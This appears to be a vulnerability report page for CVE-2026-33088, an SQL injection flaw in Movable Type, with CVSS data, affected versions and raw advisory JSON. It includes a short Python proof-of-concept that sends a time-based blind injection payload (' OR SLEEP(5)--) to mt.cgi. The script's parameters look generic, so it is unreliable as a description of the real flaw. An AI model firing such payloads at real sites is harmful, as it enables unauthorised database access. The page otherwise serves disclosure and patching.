Security Vulnerability Report
中文
CVE-2026-33088 CVSS 9.8 CRITICAL

CVE-2026-33088

Published: 2026-04-08 09:16:21
Last Modified: 2026-04-20 17:20:18

Description

Movable Type provided by Six Apart Ltd. contains an SQL Injection vulnerability which may allow an attacker to execute an arbitrary SQL statement.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:sixapart:movable_type:*:*:*:*:advanced:*:*:* - VULNERABLE
cpe:2.3:a:sixapart:movable_type:*:*:*:*:advanced:*:*:* - VULNERABLE
cpe:2.3:a:sixapart:movable_type:*:*:*:*:advanced:*:*:* - VULNERABLE
cpe:2.3:a:sixapart:movable_type:9.1.0:*:*:*:advanced:*:*:* - VULNERABLE
cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium_advanced:*:*:* - VULNERABLE
cpe:2.3:a:sixapart:movable_type:9.0.5:*:*:*:premium_advanced:*:*:* - VULNERABLE
cpe:2.3:a:sixapart:movable_type:9.0.6:*:*:*:premium_advanced:*:*:* - VULNERABLE
cpe:2.3:a:sixapart:movable_type:9.1.0:*:*:*:premium_advanced:*:*:* - VULNERABLE
Movable Type < 9.07

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (placeholder) target_url = "http://example.com/mt/mt.cgi" # Malicious payload to test SQL injection # Example: Checking for time-based blind SQL injection payload = "' OR SLEEP(5)--" params = { "__mode": "view", "_type": "entry", "id": payload } try: response = requests.get(target_url, params=params, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability detected! SQL Injection successful.") else: print("[-] Vulnerability not detected or payload incorrect.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33088", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:21.213", "lastModified": "2026-04-20T17:20:18.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Movable Type provided by Six Apart Ltd. contains an SQL Injection vulnerability which may allow an attacker to execute an arbitrary SQL statement."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sixapart:movable_type:*:*:*:*:advanced:*:*:*", "versionStartIncluding": "8.0.2", "versionEndExcluding": "8.0.10", "matchCriteriaId": "E9932FC9-6FE6-4D49-B14A-88655FCC3F09"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sixapart:movable_type:*:*:*:*:advanced:*:*:*", "versionStartIncluding": "8.8.0", "versionEndExcluding": "8.8.3", "matchCriteriaId": "8D1EDB69-C876-44CD-872E-B516269013FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sixapart:movable_type:*:*:*:*:advanced:*:*:*", "versionStartIncluding": "9.0.1", "versionEndExcluding": "9.0.7", "matchCriteriaId": "1E752A5F-BD39-4024-9791-D1D816F13599"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sixapart:movable_type:9.1.0:*:*:*:advanced:*:*:*", "matchCriteriaId": "69BA6472-F15D-4B42-A264-04B9C52FAF11"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium_advanced:*:*:*", "versionEndIncluding": "2.14", "matchCriteriaId": "09DB1CCF-6A57-4A3F-AA0F-857A73E71792"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sixapart:movable_type:9.0.5:*:*:*:premium_advanced:*:*:*", "matchCriteriaId": "7212698E-C32C-418D-9674-5A92AF165D58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sixapart:movable_type:9.0.6:*:*:*:premium_advanced:*:*:*", "matchCriteriaId": "19071E2C-D05C-4DD5-85A5-278F99AF152B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sixapart:movable_type:9.1.0:*:*:*:premium_advanced:*:*:*", "matchCriteriaId": "99E9FBCF-3C7A-4383-AEEA-523F091914B1"}]}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN66473735/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://movabletype.org/news/2026/04/mt-907-released.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sixapart.jp/movabletype/news/2026/04/08-110 ... (truncated)